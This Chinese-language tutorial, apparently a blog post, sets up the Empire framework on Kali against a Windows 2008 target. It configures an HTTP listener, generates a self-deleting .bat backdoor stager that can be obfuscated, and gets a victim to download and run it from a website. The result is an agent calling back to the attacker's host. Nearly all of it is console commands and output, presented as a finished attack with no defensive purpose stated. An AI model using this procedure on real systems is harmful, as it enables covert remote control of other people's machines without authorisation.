1、环境
kali Linux windows2008 Empire工具包
2、安装Empire
直接在github网站搜索Empire,找到对应的安装链接,复制链接到kali完成下载克隆
接下来安装Empire,进入目录:Empire/setup ,输入./install.sh,等待完成安装
3、配置监听器
启动empire,输入命令./empire
查看/创建一个监听器
1 (Empire) > listeners 2 3 [*] Active listeners: 4 5 Name Module Host Delay/Jitter KillDate 6 ---- ------ ---- ------------ -------- 7 hack http http://kali[ip]:8080 5/0.0 8 9 (Empire: listeners) >
先删掉之前所有创建的监听器和agents
1 (Empire: listeners) > kill all 2 [>] Kill all listeners? [y/N] y
1 (Empire: agents) > remove all 2 [>] Remove all agents from the database? [y/N] y 3 [*] Agent % deleted 4 (Empire: agents) >
使用http进行监听
1 Empire: listeners) > uselistener 2 dbx http_com http_hop meterpreter redirector 3 http http_foreign http_mapi onedrive 4 (Empire: listeners) > uselistener http 5 (Empire: listeners/http) >
查看配置info
(Empire: listeners/http) > info Name: HTTP[S] Category: client_server Authors: @harmj0y Description: Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach. HTTP[S] Options: Name Required Value Description ---- -------- ------- ----------- SlackToken False Your SlackBot API token to communicate with your Slack instance. ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other). KillDate False Date for the listener to exit (MM/dd/yyyy). Name True hack Name for the listener. Launcher True powershell -noP -sta -w 1 -enc Launcher string. DefaultDelay True 5 Agent delay/reach back interval (in seconds). DefaultLostLimit True 60 Number of missed checkins before exiting WorkingHours False Hours for the agent to operate (09:00-17:00). SlackChannel False #general The Slack channel or DM that notifications will be sent to. DefaultProfile True /admin/get.php,/news.php,/login/ Default communication profile for the agent. process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host True http://kali[ip]:8080 Hostname/IP for staging. CertPath False Certificate path for https listeners. DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0). Proxy False default Proxy to use for request (default, none, or other). UserAgent False default User-agent string to use for the staging request (default, none, or other). StagingKey True n/Q~uC?0_&l4fd2Z}XKa<Lt:FOoG[^5k Staging key for initial agent negotiation. BindIP True 0.0.0.0 The IP to bind to on the control server. Port True 8080 Port for the listener. ServerVersion True Microsoft-IIS/7.5 Server header for the control server. StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php
与msf类似,set 配置Host与端口
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > set Host kali[ip]:8080
(Empire: listeners/http) > set Name hack
(Empire: listeners/http) > info Name: HTTP[S] Category: client_server Authors: @harmj0y Description: Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach. HTTP[S] Options: Name Required Value Description ---- -------- ------- ----------- SlackToken False Your SlackBot API token to communicate with your Slack instance. ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other). KillDate False Date for the listener to exit (MM/dd/yyyy). Name True hack Name for the listener. Launcher True powershell -noP -sta -w 1 -enc Launcher string. DefaultDelay True 5 Agent delay/reach back interval (in seconds). DefaultLostLimit True 60 Number of missed checkins before exiting WorkingHours False Hours for the agent to operate (09:00-17:00). SlackChannel False #general The Slack channel or DM that notifications will be sent to. DefaultProfile True /admin/get.php,/news.php,/login/ Default communication profile for the agent. process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host True http://kali[ip]:8080 Hostname/IP for staging. CertPath False Certificate path for https listeners. DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0). Proxy False default Proxy to use for request (default, none, or other). UserAgent False default User-agent string to use for the staging request (default, none, or other). StagingKey True n/Q~uC?0_&l4fd2Z}XKa<Lt:FOoG[^5k Staging key for initial agent negotiation. BindIP True 0.0.0.0 The IP to bind to on the control server. Port True 8080 Port for the listener. ServerVersion True Microsoft-IIS/7.5 Server header for the control server. StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php
启动监听器
(Empire: listeners/http) > execute
[*] Starting listener 'hack1'
* Serving Flask app "http" (lazy loading)
* Environment: production
WARNING: Do not use the development server in a production environment.
Use a production WSGI server instead.
* Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http) >
4、生成后门文件
使用usestager来生成后门,让靶机下载执行此后门文件,支持Windows、Linux
1 (Empire: listeners/http) > back 2 (Empire: listeners) > usestager 3 multi/bash osx/dylib windows/backdoorLnkMacro windows/launcher_sct 4 multi/launcher osx/jar windows/bunny windows/launcher_vbs 5 multi/macro osx/launcher windows/csharp_exe windows/launcher_xml 6 multi/pyinstaller osx/macho windows/dll windows/macro 7 multi/war osx/macro windows/ducky windows/macroless_msword 8 osx/applescript osx/pkg windows/hta windows/shellcode 9 osx/application osx/safari_launcher windows/launcher_bat windows/teensy 10 osx/ducky osx/teensy windows/launcher_lnk 11 (Empire: listeners) > usestager windows/launcher_bat 12 (Empire: stager/windows/launcher_bat) > info
查看配置信息,这里需要给Listener配置一个值,名字要与监听器的名字一致!!!
1 (Empire: stager/windows/launcher_bat) > info 2 3 Name: BAT Launcher 4 5 Description: 6 Generates a self-deleting .bat launcher for 7 Empire. 8 9 Options: 10 11 Name Required Value Description 12 ---- -------- ------- ----------- 13 Listener True Listener to generate stager for. 14 OutFile False /tmp/launcher.bat File to output .bat launcher to, 15 otherwise displayed on the screen. 16 Obfuscate False False Switch. Obfuscate the launcher 17 powershell code, uses the 18 ObfuscateCommand for obfuscation types. 19 For powershell only. 20 ObfuscateCommand False Token\All\1,Launcher\STDIN++\12467The Invoke-Obfuscation command to use. 21 Only used if Obfuscate switch is True. 22 For powershell only. 23 Language True powershell Language of the stager to generate. 24 ProxyCreds False default Proxy credentials 25 ([domain\]username:password) to use for 26 request (default, none, or other). 27 UserAgent False default User-agent string to use for the staging 28 request (default, none, or other). 29 Proxy False default Proxy to use for request (default, none, 30 or other). 31 Delete False True Switch. Delete .bat after running. 32 StagerRetries False 0 Times for the stager to retry 33 connecting. 34 35 36 (Empire: stager/windows/launcher_bat) > set Listener hack1 37 (Empire: stager/windows/launcher_bat) > info 38 39 Name: BAT Launcher 40 41 Description: 42 Generates a self-deleting .bat launcher for 43 Empire. 44 45 Options: 46 47 Name Required Value Description 48 ---- -------- ------- ----------- 49 Listener True hack1 Listener to generate stager for. 50 OutFile False /tmp/launcher.bat File to output .bat launcher to, 51 otherwise displayed on the screen. 52 Obfuscate False False Switch. Obfuscate the launcher 53 powershell code, uses the 54 ObfuscateCommand for obfuscation types. 55 For powershell only. 56 ObfuscateCommand False Token\All\1,Launcher\STDIN++\12467The Invoke-Obfuscation command to use. 57 Only used if Obfuscate switch is True. 58 For powershell only. 59 Language True powershell Language of the stager to generate. 60 ProxyCreds False default Proxy credentials 61 ([domain\]username:password) to use for 62 request (default, none, or other). 63 UserAgent False default User-agent string to use for the staging 64 request (default, none, or other). 65 Proxy False default Proxy to use for request (default, none, 66 or other). 67 Delete False True Switch. Delete .bat after running. 68 StagerRetries False 0 Times for the stager to retry 69 connecting. 70 71 72 (Empire: stager/windows/launcher_bat) >
然后执行,生成后门文件到/tmp目录下
1 (Empire: stager/windows/launcher_bat) > execute 2 3 [*] Stager output written out to: /tmp/launcher.bat 4 5 (Empire: stager/windows/launcher_bat) >
将后门文件上传到网站目录下,让靶机用户访问、下载、执行
靶机目标运行后,取得连接shell
输入agents进行回连
连接
1 (Empire: agents) > interact 8R4AD1NC 2 (Empire: 8R4AD1NC) >
攻击完成